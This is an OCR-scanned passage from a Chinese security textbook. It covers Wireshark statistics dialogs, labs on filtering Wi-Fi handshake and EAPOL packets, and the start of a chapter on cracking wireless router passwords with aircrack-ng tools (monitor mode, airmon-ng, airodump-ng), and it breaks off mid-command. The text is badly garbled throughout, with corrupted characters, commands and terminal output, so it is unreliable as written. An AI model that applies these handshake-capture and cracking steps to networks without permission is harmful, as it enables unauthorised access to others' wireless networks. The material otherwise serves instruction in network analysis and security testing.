(Cnotes) 以 及 对 话 信 息 (chats) 。 查 看 专 
eos og 
选择 “分 析 ” 菜 单项 ， ee 
ry “专家 信息 ”菜单 命令 ， 
图 所 示 。 


SCTP 
追踪 流 


专家 信息 
打开 “专家 信息 ”对 话 框 ， 如 下 图 所 
示 。 其 中 错误 信息 会 以 红色 进行 标注 ， 警 
告 信息 以 黄色 进行 标注 ， 注 意 信 息 以 浅 蓝 
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色 进 行 标注 ， 正 常 通信 以 深蓝 色 进 行 标注 ， 每 一 种 类 型 会 单独 列 出 一 行进 行 显示 ， 通 过 专 
家 信息 可 以 更 直观 地 查看 数据 通信 中 存在 哪些 问题 。 
Wireshark .专家 信息 .tcp.pcapng 日 日 日 


Group 


Severity * Summary 协议 计数 
b 


显示 过 涉 器 ， ”icp.streameg0" 


显示 过 滤器 的 限制 。“v 按 捅 要 分 组 。 搜索 : | 


| Help | 区 


虽 渤 如 7.3.2 ”统计 数据 包 

通过 对 数据 包 的 统计 分 析 ， 可 以 查看 更 为 详细 的 数据 信息 ， 进 而 分 析 网 络 中 是 否 存在 
安全 问题 。 查 看 数据 包 统计 信息 的 操作 步骤 如 下 : 

[Sep 国 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “捕获 文件 属性 ”菜单 命令 ， 打 开 “ 捕 

获 文件 属性 ”对 话 框 ， 在 其 中 可 以 查看 文件 、 事 件 、 捕 获 、 接 口 等 信息 ， 如 下 图 所 示 。 


Wireshark .捕获 文件 属性 .tcp.pcapng 后 日 目 
节 

文件 

名 种 : lroot/Downloads/tcp.pcapng 

长 度 : 1,070 kB 

格式 : Wireshark/... - pcapng 

封装 : Ethernet 

时 间 

第 一 个 分 组 : 2018-10-10 21:43:23 

最 后 分 组 : 2018-10-10 21:45:39 

经 过 时 间 ]: 00:02:16 

捕获 

硬件 : AMD Phenom(tm) I| X6 1090T Processor 

Os: Linux4.18.0-xaliL-amd64 

应 用 : Dumpcap [Wireshark) 2.6.3 [Git v2.6.3 packaged as 2.6.3-1) 
接口 

接口 去 弃 分 组 捕获 过 滤器 链 路 类 型 分 组 大 小 限制 

wlanQ 0 (0 %) 二 Ethernet 262144 字 节 
钴 计 

捕获 文件 描述 
| BHelp || gM 新 复制 到 剪贴 板 Qi 保存 注释 | 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “协议 分 级 ”菜单 命令 ， 打 开 “ 协 
议 分 级 统计 ”对 话 框 ， 如 下 图 所 示 。 从 这 里 可 以 统计 出 每 一 种 协议 在 整个 数据 包 中 的 此 
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Wireshark -协议 分 级 统计 -tcp.Pcapng © 
协议 * 控 分 组 而 分 比 分 组 。” 控 字 节 而 分 比 字 节 比特 / 秘 End packets End Bytes End Bits/s 
* IFrame 100.0 3315 100.0 955542 56K 0 0D 0 
- Ethemet 1000 3315 4.8 46410 2,723 0 0 0 
r Internet Protocol Version 6 0,1 2 0.0 80 1 0 0 0o 
Internet Control Message Protocol Yb 0.] 2 0.0 56 3 2 56 3 
- Internet Protocol Version 4 99.8 3310 6.9 66200 3,885 0 0 0 
~ User Datagram Protocol 11.0 361 0D.3 2912 170 0 0 0 
Network TIme Protocol 02 7 0.0 336 19 了 336 19 
Domain Name System 10.8 357 2.7 25531 1,498 357 25531 1,498 
- Transmission Control Protoco! 38,8 2943 85.2 8165601 47k 2455 604463 35k 
SeruUre SOCKets Layer 10,5 349 19,2 183994 lOKk 338 155749 9,14] 
Malformed Packet 14 39 0.0 0 0 39 0 0 
- Hypertext Transfer Protocol 3.3 109 20.2 193408 11k 83 52196 3,650 
Online Certificate Statys Protocol D2 6 0.1 l266 74 6 1265 74 
Media Type 02 7 4.5 42683 2,505 7 45574 2,674 
Line based taxt data 0.4 13 15.3 146915 8,622 13 808141 14,714 
Darta 0O,] 2 0,3 2692 157 2 2692 157 
Internet Control Message Protocol 0,1 3 0.0 316 18 3 316 18 
Address Resolution Protocol 0,1 3 0.0 31 1 3 81 | 


4 
不 息 示 讨 嫂 解 . 


加 Help 复制 ~ | * Glose | 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “对 话 ” 菜 单 命令 ， 打 开 下 图 所 示 
的 对 话 框 ， 其 中 包括 以 太 网 、IPV4、IPV6、TCP、UDP 等 不 同 协 议会 话 信息 展示 。 


Wireshark . Conversations , tcp.pcapng ©@@ 
Ethernet .3 IPv4:30 | IPv6.1 | TCP:121 UDP.127 
Address A 7 AddressB Packets Bytes Packets A > 日 BytesA>B PacketsB 3A Bytes B > 上 Rel Start Duration Bits/s A>B 
33':33:00'00:00:16 as8'4e"06:28:ae'46 2 180 0 0 2 180 57.976722 0.9841 
ea8-4e:06:28-ae:46 14:83:cd-33-60:73 3310 958 k 1,805 177k 1,505 780k 0.000000 136.3053 
f4:83:cd:33-60:73 村 人 化 作 什 什 3 126 3 126 D OO 7284020 80.0039 


解析 名 称 刚 示 过 小 吻 的 限制 纺 对 开始 寻 间 Conversation 涩 型 - 


国 Hetp 皇 制 - | xcStose | 
选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “端点 ”菜单 命令 ， 打 开 下 图 所 示 
的 “端点 ”对 话 框 ， 其 中 包含 以 太 网 和 各 种 协议 选项 。 
Wireshark . Endpoints . tcp.pcapng 提 日 四 


Ethernet-4 | IPv4.31 | IPv6.2 | TCP.145 | UDP.133 


Address 7 Packets Bytes Tx Packets Tx Bytes Rx Packets Rx Bytes 
33:33:00:00:00:16 2 180 0 0 2 180 
e8:4e:06:28:ae:46 3,312 958 1,807 178k 1,505 780 k 
f4:83:cd:33:60:73 3,313 958« 1,508 780k 1,805 177 Kk 
fF:ff:ff: fF:ff:ff 3 126 0 0 3 126 
解析 名 种 显示 过 滤器 的 限制 Endpoint 类 型 ~ 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “分 组 长 度 ” 菜 单 命令 ， 打 开 下 图 
所 示 的 “分 组 长 度 ” 对 话 框 。 这 里 可 以 对 不 同 大 小 数据 包 进 行 统计 。 


Wireshark . Packet Lengths .tcp.pcapng @©@ 
Topic | ltem ^ Count Average Min val Max val Rate (ms) Percent Burst rate Burst start 
~ Packet Lengths 3315 289.15 42 1514 0.0243 100% 1.6200 134.305 
0-19 0 - - - 0.0000 0.00% - - 
20-39 0 - - - 0.0000 0.00% - - 
40-79 2122 63.50 42 79 0.0156 64.01% 1.4500 134.342 
80-159 372 105.34 80 159 0.0027 11.22% 0.1200 77.159 
160-319 150 213.17 160 312 0.001L1 4.52% 0.0500 131.903 
320-639 173 479.33 323 625 0.0013 5.22% 0.0600 90.234 
640-1279 108 867.93 640 1270 0.0008 3.26% 0.0400 65.397 
1280-2559 390 1476.87 1306 1514 0.0029 11.76% 0.1400 131.015 
2560-5119 0 - - - 0.0000 0.00% - - 
5120 and greater 0 - - - 0.0000 0.00% - - 
显示 过 滤器 : Entera display filter .… 应 用 


复制 另存 为 .… 其 Close 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “LO 图 表 ” 菜 单 命 令 ， 打 开 下 图 所 
示 的 “IO 图 表 ” 对 话 框 ， 其 中 包括 一 个 坐标 轴 显 示 的 图 表 ， 下 方 可 以 添加 任意 的 协议 ， 
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也 可 以 选择 协议 显示 的 颜色 ， 还 可 以 调整 坐标 轴 的 刻度 。 


Wireshark ,10 图表 ,tcp.pcapng 日 日 四 


Wireshark IO 图 表 : tcp.pcapng 


Packets 几 种 


时 间 ( 秒 ) 
应 圭 先 时 分 组 3015 (131s = 70) 
Enabled ‘Graph Name Display Filter Color Style Y Axls 'Y Field SMA Period 
vy 所 有 分 组 国 Line Packets None 


TCP 错误 tcp.analysis... 


+||-||m| 局 标 久 拖 搜 口 缩 放 间隔 |1 秒 。 ”| 一 天 时 圳 对 数 刻度 复位 | 

| BHelp | 复制 || X*Close ||DisaveAs..| 
step 加 选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “流量 图 ”菜单 命令 ， 打 开 下 图 所 
示 的 “流量 图 ”对 话 框 ， 其 中 包括 通信 时 间 、 通 信 地 址 、 端 口 以 及 通信 过 程 中 的 协议 功 
能 ， 非 常 清晰 明了 。 


Wireshark . 流 ,tcp.pcapng ©@ee 


192.168.0,110 143.204.135.64 
时 间 80 239 178 19 ' 


2018-10-10 21:43;24,203564244 
2018-10-10 21:43:25.154626306 
2018-10-10 21:43:25.220232780 
2018 10 10 21:43:25.743965404 
2018-10-10 21;43;26,287053877 
2018-10-10 21:43:26,287072961 
2018-10-10 21.43:26.287075843 
2018-10-10 21:43:26,330718250 
2018-10-10 21:43:26.355297507 


a 
5 太 碟 2943 堪 目 


显示 过 滤器 的 限制 壤 类 型 ' TCP Flows ”> 地 址 ， 任何 ~ 
复位 
加 Hetp | xclose | misave As- 


选择 “统计 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “TCP 流 型 图 ”菜单 命令 ， 打 开 下 
图 所 示 的 对 话 框 。 在 其 中 可 以 根据 实际 需要 设置 相应 的 显示 ， 还 可 以 切换 数据 包 的 方向 。 
吞吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) ] 


吞吐 量 对 于 192.168.0.110:44786 > 80.239.178.19:80 (MA) 


tcp.pcapng 
24 > 
人 

a@ 1 16 3 
后 个 
吕 0 0.8 了 
wu © 
二 0 0 5 
5 0 于 
= 08 & 
La] 
8 县 

16 各 

也 
2 2.4 
0 15 3 4.5 6 7.5 9 
Time (s) 

往返 时 间 分 组 0 bytes * 3 分 组 , 0 bytes 
类 型 | 吞吐 量 MA Window(s) |1.000000 了 流 |1 ”党 | 切换 方向 
鼠标 | 时 间 /序列 (Stevens) V 段 长 度 IV| 吞吐 量 ”| 实际 吞吐 量 复位 | 
加 时 上/ 导 列 (tcptrace) | x¥ Close |[DiSave As.. | 


窗口 尺寸 
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实战 演练 


实战 演 练 1 一 一 筛选 出 无 线 通 信 中 的 握手 信息 
筛选 无 线 通信 中 握手 信息 


7.4 


ES 
= 


第 7 


可 以 通过 以 下 几 个 步骤 进行 : 


将 网 卡 置 入 monitor 模 式 。 使 用 iw dev wlan0 interface add wlan0mon type monitor 命 令 


将 网 卡 置 入 monitor 模 式 ， 如 下 图 所 示 。 


root@kali:~# iw dev wLang interface add wLangmon type monitor 


root@kali:-~# iwconfig 
wlanOmon IEEE 862.11 Mode:Monitor 
Retry Short long Limit:2 RTS 


Power Management:off 


IEEE 802.11 ESSID:off/any 
Mode:Managed Access Point: Not 
Retry short long Limit:2 RTS 
Encryption key:off 

Power Management:off 


wlan0 


lo no wireless extensions. 


ethO no wireless extensions. 


使 用 ifconfig wlan0mon up 命令 ， 将 新 创建 的 无 线 网 卡 启 动 ， 


root@kali:~# ifconfig wlandmon Up 
root@Kkali:~# ifconfig 
ethO: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> 
inet6 fe80: :20c:29ff:fe7f:39f2 prefixlen 64 
ether QO0:0c:29:7f:39:f2 txqueuelen 1069 
RX packets 14827 bytes 20048396 (19.1 MiB) 
RX errors 0 dropped 6 overruns © frame 0 
TX packets 4945 bytes 311322 (304.0 KiB) 
TX errors 0 dropped 6 overruns © carrier 0 
lo: flags=73<UP,LODPBACK,RUNNING> mtuyu 65536 
ne 2 netnns ed 
inet6 ::1] prefixlen 128 scopeid 9Xx10<host> 
loop txqueuelen 1906 (Local Loopback) 
RX packets 164 bytes 8356 (8.1 KiB) 
RX errors 0 dropped 6 overruns 9 frame 0 
TX packets 164 bytes 8356 (8.1 KiB) 
TX errors 9 dropped 6 overruns © carrier 0 


wlanemon: fLags=4163<UP ,BRDADCAST, RUNNING ,MULTICAST> 


unspec E8-4E-86-28-AE-406-99-90-990-99-960-990-99- 


RX packets 102 bytes 151390 [14.7 KiB) 
RX errors D dropped 6 overruns 9 frame 0 
TX packets 0 bytes 6 (9.9 B) 
TX errors 0 dropped 6 overruns 0 


启动 Wireshark 抓 包 


carrier 0 


Tx-Power=20 dBm 


thrasofi Fragment thr:off 


TXx-Power=20 dBm 
Fragment thr:off 


-Associated 
thr:off 


如 下 图 所 示 。 


mtu 1500 


scopeid 6x20<Link> 


(Ethernet) 


collisions 9 


collisions 9 


mtu 1500 


60-09-00 txqueuelen 109006 (UNSPEC) 


collisions 0 


工具 ， 选 择 wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 


Capture 


.Using this filter: [|Enter a capture filter .. 
ethO 
any 


Loopback: lo 
nflog 


Learn 


wlanOQOmon Se 


在 抓 取 到 的 数据 包 中 筛选 并 标记 出 握手 信息 


数据 包 ， 如 下 图 所 示 。 


Destination Protocol Length Info 

VivaoMobi_a8:f3:a3 (B8:23:b2:a8:f3:a3) {RA) 802 .11 16 Request -to-send, Flags=........ 
VivoMobi a8:f3:a3 :b2 : a3}) (RA) 1 16 Request -to-send 

VivoMobi a8:f a3}) {RA) 19 ACknowledogement ， 

VivoMobi a8 : a3] {RA) 16 Request -to0-send, 

Guangdon_43: 45) (RA) 16 Acknowledgement, Fladg 
VivoMob1i_a8: (B8 :a3}) (RA} 10 Acknowledgement, Flags=,.,..,...., 
VivoMobi_a8:f3:a3 (98:23:b2:a8:f3:a3) {RA) 802 .11 16 Request -to-send，Flags=......-.. 
VivoMobi a8:f3:a3 (88:23:b2:a8:f3:a3) {RA) 862.11 16 Request-to-send, Flags=........ 
VivoMobi a8: :a3) { 16 Request -to-send, 

VivoMobi as8: 3 :a3) {R/ 18 Acknowledogement, 

VivoMobi a8: :a3)] . 16 Request -to-send, 
VivoMobi_a8:f3:a3 (98:23:b2:a9:f3:a3) (RA} 802 .11 16 Request -to-send, Flags=,......,.. 
VivoMobi_a8:f3 (D8:23 aa'f3:a3 802 .11 16 Request -to-send, Flags= 


VivoMobi a8:T13: 


-send, Flags=... 


16 Request -to 
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选择 “文件 ”菜单 项 ， 在 弹出 的 菜单 列表 中 选择 “导出 特定 分 组 ”菜单 命令 ， 
标记 后 的 握 考 信息 数据 包 ， 如 下 图 所 示 。 


Wireshark . Export Specified Packets © 
坦 看 : 罚 /root v* 和 4 有 志 入 三 
国 计算 机 名 称 ”大 小 类 型 日 期 被 修改 -= 
国 root 误 Desktop Folder ”2018/1... 上 午 
剖 Documents Folder ”2018/1... 上 秆 
入 Downloads Folder ”2018/1.. 上 午 
Music Folder 2018/1.. 上 午 
Pictures Folder ”2018/1.. 上 午 
时 Public Folder ”2018/1.. 上 午 ~ 
’ 上 
文件 名 称 (N) : |test| | 叶 保 存 (5) 
©S Cancel 
Export as: Wireshark/tcpdump/... - pcap - Help 
Packet Range Compress with gzip 


Captured ‘©® Displayed 


Allpackets 8975 
Selected packets only 1 
© Marked packets only 6 
First to last marked 13 
Range: D 


实战 演练 2 一 一 快速 定位 身份 验证 信息 数据 包 


通过 Wireshark 抓 取 到 整个 握手 过 程 数据 包 后 ， 用 户 可 以 通过 以 下 步骤 来 快速 定位 ， 精 
a 
通 过 Wireshark 打 开 抓 取 到 的 握手 信息 > .数据 包 , : 如 下 图 所 示 o 


Open 


/root/wap-01.cap (258 KB) 


在 第 选 条 件 文本 框 中 输入 eapol 筛 选 条 件 ， 如 下 图 所 示 。 


eapol x) 


No. Time Source Destination tocol — Info 
1 -of -OR - 


» Frame 997: 237 bytes on wire (1896 ee 237 bytes captured (1896 bits) 
» IEEE 802.11 QoS Data, Flags: ... 

» Logical-Link Control 

» 802.1xX Authentication 


[Sep 图 单 去 右 仙 的 区 了 按钮， 即 可 展开 身份 验证 信息 加 下 图 所 示 。 


aptured (: 


2 byte viiwt bi 
| IEEE 892 .11 QoS Data， 本 FF- a 
» Logical-Link Control 
~ B92,1X Authentication 
version: 882.1X-2994 {2) 
Type: Key (3) 
Length: 199 
Key Descriptor Type: EAFOL RSN Key (2) 
[Message number: 3] 
Key Information: 9x13Ca 
Key Length: 16 
Replay Counter: 2 
WPA Key Nonce: 56ebe99911f4c4c2a4453355ddd9973f3c96ar3cb8e58dT1. , ， 
Key IV: 66BDB99999699999669696696966096966BBBBB 
WPA Key RSC: 6699999999699999 
WPA Key ID: 6999969600690609069 
WPA Key MIC: d7e1510da4658ffb4a319969fbf57ecd8 
WPA Key Data Length: 104 
WPA Key Data: a45466445387eeg9g6c7B5aa3618c150a8e67267a847496070..- 


下 


7.5 “小 试 身 手 


练习 1: 使 用 Wireshark 进 行 抓 包 。 
练习 2: 使 用 沛 选 器 沛 选 出 需要 的 数据 包 。 
练习 3: 如 何 对 数据 包 进 行 标记 并 导出 这 些 标 记 的 数据 包 。 


2 


第 8 革 ”无 线路 由 停 的 密码 安全 采 略 


无 线路 由 器 
具 以 及 安全 维护 方式 都 不 同 。 


8.1 做 解密 人 码 前 的 准 台 工作 


在 开始 破解 密码 之 前 需要 有 一 些 准备 
工作 ， 这 里 需要 用 户 购 买 一 个 无 线 网 卡 ， 
该 网 卡 需 要 适合 kali 虚 拟 机 ， 一 般 atheros 心 
片 的 无 线 网 卡 可 以 安装 在 kali 虚 拟 机 中 ， 不 
过 ， 为 确保 购买 的 网 卡 正确 ， 购 买 前 请 认 
真 询问 是 否 文 持 kali 虚 拟 机 。 


8.1.1 查看 网 卡 信息 


无 线 网 卡 购买 后 ， 下 面 就 可 以 查看 网 
卡 的 信息 了 ， 包 括 网 卡 模式 、 网 卡 信息 、 
网 卡 映 射 信息 等 。 具 体操 作 步 又 如 下 : 
查看 网 卡 模式 。 使 用 iw list 命 令 查看 
网 卡 的 信息 。 下 图 为 执行 效果 。 这 里 显示 
出 来 的 模式 是 该 网 卡 所 支持 的 所 有 模式 。 


Supported interface modes: 
IBSS 

managed 

AP 

AP/VLAN 

monitor 

mesh point 


在 Kali Linux 系 统 命令 界面 中 输入 
ifconfig -a 命令 ， 通 过 这 个 命令 可 以 查看 本 
机 所 有 网 卡 信息 ， 可 以 看 到 此 时 本 台 计 算 
机 中 没有 无 线 网 卡 ， 如 下 图 所 示 。 


root@kali:-# Ifconfig -3 
ethO: flags=4163<UP,BRDOADCAST,RUNNING,MULTICAST> mtu 1588 
inet 192.168.157.131 netmask 255.255.255.8 broadcast 192.168.157.255 
inet6 fe80::20c:29ff:fe39:f29c prefixlen 64 scopeid Ox280<link> 
ether 6B:ec:29:39:f2*9c txqueuelen 1999 (Ethernet) 
RX packets 5863 bytzs 1093293 [1.8 MiB) 
RX errors 0 dropped 8 overruns © frame 68 
TX packets 1246 bytas 100278 (97.9 KiB) 
TX errors 0 dropped B overruns 0 carrier 96 collisions 0 


项 项 关上 间 癌 上 凑 


lo: flags=73<UP,LOOPBACK,RUNNING> ead 
inet 127.9.9.1 netmask 255. 
inet6 ::1 prefixlen 128 a DBx19<host> 
loop txqueueLen 1069 (Local Loopback) 
RX packets 1585 byTes 5544 (5.3 Kis) 
RX errors 9 dropped 8B overruns 9 frame 6 
TX packets 168 bytes 8544 (8.3 KiB) 
TX errors © dropped 8 overruns © carrier 96 collisions 6 


将 网 卡 映 射 进 虚拟 机 ， 选 择 vmware 


的 加 密 方式 包括 WEP、WPA 与 WPS 三 种 ， 针 对 不 同 的 方式 ， 


破解 密码 的 工 


工具 栏 中 的 “虚拟 机 ”菜单 项 ， 在 弹出 
的 菜单 列表 中 选择 “可 移动 设备 ”菜单 
命令 ， 再 从 “可 移动 设备 ”菜单 列表 中 选 
择 相 应 的 无 线 网 卡 并 进行 连接 ， 如 下 图 
所 示 。 


| sHRHWM)， 运 更 FDIH) 有 和 如 提 | 有 加 二 六 | 喇 
届 ”电源 (P) | 
CD/DVD (DE) 
各 仓 (U) Onl+Shih+p (IW) mses > 
吕 十 渤 Qtrl+Alt+ DellE) Android > 
sse crr6 Raink B02 WUN SN 
问 ” 快 滑 (NM) 》 更 疏 国光 中 
其 艾 屏 和 存 ( 口 Ctd:Akt+prtscn | Eeens) 
总 于 (IM) 
至 部 去 名 VMware Tools(T 
吨 设置 (.， 


i i ond 按钮 ， 如 下 图 
所 示 。 


kali-linux-2018.3-vm-amd64 - VMware Workstation XxX 


@ 某 个 U58 设备 将 要 从 主机 找 出 并 连接 到 该 虚拟 机 。 该 设备 将 先 
”停止 以 实现 安全 移 除 。 对 于 某 些 设备 ， 主机 可 能 会 显示 消息 现 
在 可 以 安全 地 移 除 设备 。 


器] 不 再 显示 此 消息 (S) 


确定 取消 


再 次 运行 ifconfig -a 命令 。 这 时 会 多 出 
一 个 wlan 开 头 的 网 卡 ， 这 就 是 无 线 网 卡 ， 
如 下 图 所 示 。 


root@kali:-~# ifconfiqg -a 
etho: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtuy 1509 
Inet 192.168.157.131 netmask 255.255.255.8 broadcast 192.168.157.255 
inet6 fe88::20c:29ff:fe39:f29c¢ prefixlen 64 scopeid ex20<link> 
ether gg:8c:29:39:f2:9c¢ txqueuelen 1999 (Ethernet) 
RX packets 500396 bytes 66929258 [63.8 MiB) 
RX errors 8 dropped 9 overruns 9 frame 日 
TX packets 22877 bytes 1399881 (1.3 MiB) 
TX errors 8 dropped 6 overruns 9 carrier 9 collisions 6 


lo: flags=73<UP,LOOPBACK,RUNNING> mtu 55536 
inet 127.6.09.1 netmask 255.9.8.9 
inet6 ::1 prefixlen 128 scopeid 0x19<host> 
Loop txqueuelen 1668B (LocalL Loopback) 
RX packels 172 byles 8784 (8.5 KiB) 
RX errors 9 dropped 6 overruns 0 frame 8 
TX packets 172 bytes 8784 (8.5 KiB) 
TX errors 9 dropped 0 overruns 8 carrier 86 collisions ©f 


wlang: flags=409B<BROADCAST,MULTICAST> mtu 1560 
ether f2:34:da:cl:78:64 txqueuelen 1960 (Ethernet) 
RX packets 9 bytes 98 [9.8 B) 
RX errors 9 dropped 8 overruns © frame 6 
TX packets ©@ bytes 8 (9.8 B) 
TX errors 9 dropped 9 overruns 6 carrier 9 collisions 日 


使 用 iwconfig 命 令 ， 来 只 显示 无 线 网 
卡 信 息 ， 下 图 为 执行 效果 。 
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Ed 


root@kali:~# iwconfig 
lo no wireless extensions. 


IwLane IEEE 862.11 ESSID:"TPGuest 6073” 

Mode:Managed _ Frequency:2.437 GHz Access Point: 86:83:CD:33:60:73 
Bit Rate=1 Mb/s 
Retry short long Mimit:2 
Encryption key:off 

Power Management:off 

Link Quality=79/79 Signal level=-17 dBm 

Rx invalid nwid:@ Rx invalid crypt:8 Rx invalid frag:0 
Tx excessive retrizs:25 Invalid misc:0 Missed beacon:0 


Tx-Power=20 dBMm 


RTS thr:off Fragnent thr:off 


ethe no wireless extensions. 


上 step 回 使 用 iw dev wlan0 interface add 


wlan0mon type monitor 命 令 可 以 将 一 个 网 卡 
植 入 混杂 模式 ， 如 下 图 所 示 。 其 中 dev 后 面 
跟 的 是 具体 无 线 网 卡 的 名 称 ， 新 增加 的 网 
卡 名 称 必 须 是 wlan+ 一 个 数字 +mon 形 式 。 
root@kali:-# iw dev wLang interface add wLan6mon type monitor | 
设置 完成 后 ， 运 行 iwconfig 命 令 ， 查 
Pr 如 下 图 所 示 。 其 中 会 多 
出 一 个 wlan0mon 无 线 网 卡 ， 并 且 模 式 是 
monitor (混杂 模式 ) 。 


root@kali:-# Jw dev wlang interfTace add WULangomon type monitor 
root@kali:-~# iwconfig 
lo no wireless extensions. 


wlangmon IEEE 892.11 Mode:Monitor Tx-Power=29 dBm 
Retry short long limit:2 RTS thr:off 
Power Management:off 


Fragnent thr:off 


wlang IEEE 802.11 ESSID:"*TPGuest 6073" 
Mode:Managed Freguency:2.437 GHz Access Point: 86:83:CD:33:60:73 
Bit Rate=l Mb/s Tx-Power=20 dBm 
Retry short Long limit:2 RTS thr:off 
Encryption key:off 
Power Management:off 
Link QUuaLiry=yor7e Signal level=-17r dm 
Rx invalid nwid:@ Rx invalid crypt:© Rx invalid frag:0 
Tx excessive retries:25 Invalid misc:8 Missed beacon:0 


Fragnent thr:off 


ethO no wireless extensions. 


执行 ifconfig wlan0mon up 命令 ， 
新 加 入 的 无 线 网 卡 启 用 ， 再 次 运行 ifconfig 
命令 ， 可 以 看 到 网 卡 列 表 中 已 经 启用 的 
wlan0mon 无 线 网 卡 ， 如 下 图 所 示 。 此 时 使 
用 Wireshark 抓 包 软 件 便 可 以 抓 取 802.11 无 线 
通信 协议 数据 包 了 。 


Langmon: flags=41653<UP,BRDADCAST,RUNNING,MULTICAST> mty 15868 

unspec E8-4E-06-28-AE-46-38-3A-980-80-08-00-80-89-08-00 txgueuelen 1008 
(UNSPEC) 

RX packets 2308 bytes 360342 (351.8 KiB) 

RX errors 8 dropped 2388 overruns 0 frame 9 

TX packets 9 bytes 9 (9.9 B) 

TX errors 8 dropped © overruns © carrier 8 collisions 0 


常 公 破解 工具 一 一 aircrack 


aircrack 是 目前 WEP/WPA/WPA2 破 解 领 
域 中 最 热门 的 工具 ，aircrack-ng 套 件 包含 的 


8.2 
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工具 能 够 捕捉 数据 包 和 握手 包 ， 生 成 通信 数 
据 ， 或 进行 暴力 破解 攻击 以 及 字典 攻击 ， 
该 套件 包含 airmon-ng、aircrack-ng、aire- 
play-ng、airodump-ng、airbase-ng 等 工具 。 


8.2.1 airmon-ng 工 具 


airmon-ng 工 具 属 于 aircrack-ng 套 件 中 的 
一 种 ，airmon-ng 用 来 实现 无 线 接口 在 man- 
aged 和 monitor 模 式 之 间 的 转换 及 清除 干扰 
进程 。 

使 用 airmon-ng 工 具 的 操作 步骤 如 下 : 
运行 airmon-ng 命 令 ， 即 可 查看 无 线 网 
rp ge 信息 ， 如 下 图 所 示 。 


root@kali:~# airmon-ng 


PHY Interface Driver Chipset 


phy1 wlang rt2808usb Ralink Technology, Corp. RT2870/RT3070 


运行 airmon-ng --h 命 令 ， 即 可 查看 
arimon-ng 工 具 的 命令 格式 ， 如 下 图 所 示 。 


root@kali:-# airmon-ng --h 


usage: airmon-ng <start|stop|check> <interface> [channel or frequency] 


运行 airmon-ng check 命 令 ， 即 可 查看 
有 哪些 进程 会 影响 到 aircrack-ng 套 件 的 工 
作 ， 如 下 图 所 示 。 


root@Kkali:~# airmon-ng check 


Found 4 processes that could cause trouble. 

Kill them using 'airmon-ng check kill' before putting 

the card in monitor mode, they will interfere by changing channels 
and sometimes putting the interface back in managed mode 


PID Name 

484 NetworkManager 
569 wpa supplicant 
2736 dhclient 
4492 dhclient 


移 提 示 : 查询 完成 后 ， 用 户 可 以 通过 kill 
命令 加 进程 PID 号 终止 相关 进程 ， 但 是 air- 
mon-ng 工 具 提 供 了 一 个 简便 的 方法 ， 就 是 
运行 airmon-ng check kill 命 令 ， 就 可 以 将 干 
扰 进 程 直接 中 断 运行 。 另 外 ， 为 了 保证 抓 
取 数 据 包 能 顺利 执行 ， 建 议 用 户 执行 service 
network-manager stop 命 令 ， 停 止 网 络 管 
理 器 的 运行 ， 因 为 这 个 服务 会 影响 抓 取 数 
据 包 。 


当 配 置 完成 后 ， 运 行 


alrmon-ng start 


wlan0 命 令 ， 将 无 线 网 卡 植 入 混杂 模式 ， 如 
下 图 所 示 。 


roote@kali:~# airmon-ng start wlane 
Found 2 processes that could cause trouble. 
Kill them using 'airmon-ng check kill' before putting 
the card in monitor mode, thzy will interfere by changing channels 
and sometimes putting the interface back in managed mode 
PID Name 
569 wpa supplicant 
2736 dhclient 
PHY Interface Drivar Chipset 
phy4 WwWLane rt2896uUsb Ralink TechnolLogy，Corp.RT287B/VRT3679 


(mac89211 monitor mode vif enabled for [phy4jwLane on [phy4]jwLangmon) 


(mac86211 station mode vif disabled for [phy4]wLang) 


se 加 运行 ifconfig 命 令 ， 可 以 查看 网 卡 信 
息 ， 下 图 为 执行 效果 。 


wlanemon: flags=4163<UP,BROADCAST,RUNNING,MULTICAST> mtu 1566 
unspec E8B-4E-66-28-AE-46-396-3A-69-69-696-660-60-66-696-66 txqueuelen 16898 (UNSPEC) 
RX packets 8364 bytes 419616 【469.1 KiB) 
RX errors 8 dropped 8364 overruns B frame 68 
TX packets 8 bytes 8 (898.0 B) 
TX errors 8 dropped 9 overruns 9 carrier 9 collisions 9 


候 提 示 : 通过 airmon-ng 工 具 可 以 ， 快速 配置 
网 卡 进 入 混杂 模式 并 启动 新 加 入 的 无 线 网 
下 这 个 原理 同 手 动 设 置 是 一 样 的 。 


8.2.2 airodump-ng 工 具 


airodump-ng 工 具 是 aircrack-ng 套 件 中 用 
于 抓 取 数 据 包 的 工具 。 使 用 airodump-ng 工 
有 具 的 操作 步骤 如 下 : 
抓 取 网 络 数据 包 。 运 行 airodump-ng 
wlan0mon 命 令 ， 进 入 轮 询 模 式 ， 并 抓 取 网 
络 数据 包 。 下 图 为 抓 取 的 信息 。 其 中 ， oH 
代表 信道 ，airodump-ng 会 从 网 卡 最 小 信道 


到 了 最 大 信道 循环 抓 取 数据 包 ， i 
一 个 信道 。 


CH 2 ][ Elapsed: 9 s ][ 2618-19-13 86:59 

B55ID PWR Beacons #Data, #/5 CH MB ENC CIPHER AUTH ESSID 
00:2F:D9:C3:57:9D -58 2 8 B 13 136 WPA CCMP PSK ChinaNet-DysG 
79;AF;6A;99;1E:;9D -59 1 有 8 13 1386 WPA2 CCMP PSK TP794613852 
38:21:87:66:20:AB -44 本 日 日 了 65 WPA2 CCMP PSK midea ac 6962 
B4:15:13:8C:10:A2 -55 日 2 9 1 -1 OPN <length: 0> 
E4:58:A3:7D:37:92 -43 1 13 8 1 54e. OPN CMCC-XJ 

BSSID STATION PWR Rate Lost Frames Probe 
B4:15:13:8C:106:A2 FO:79:E8:4]1:88:@7 -1 le- @ 日 2 

E4:68:A3:7D:37:92 1C:DD:EA:93:97:F6 -1 Le- 9 日 13 


抓 取 指定 数据 。 运 行 airodump-neg 
-C Ee --bssid 1C:FA:68:01:2F:08 -w wep002 
wlan0mon 命 令 ， 该 命令 只 抓 取信 道 为 1、 
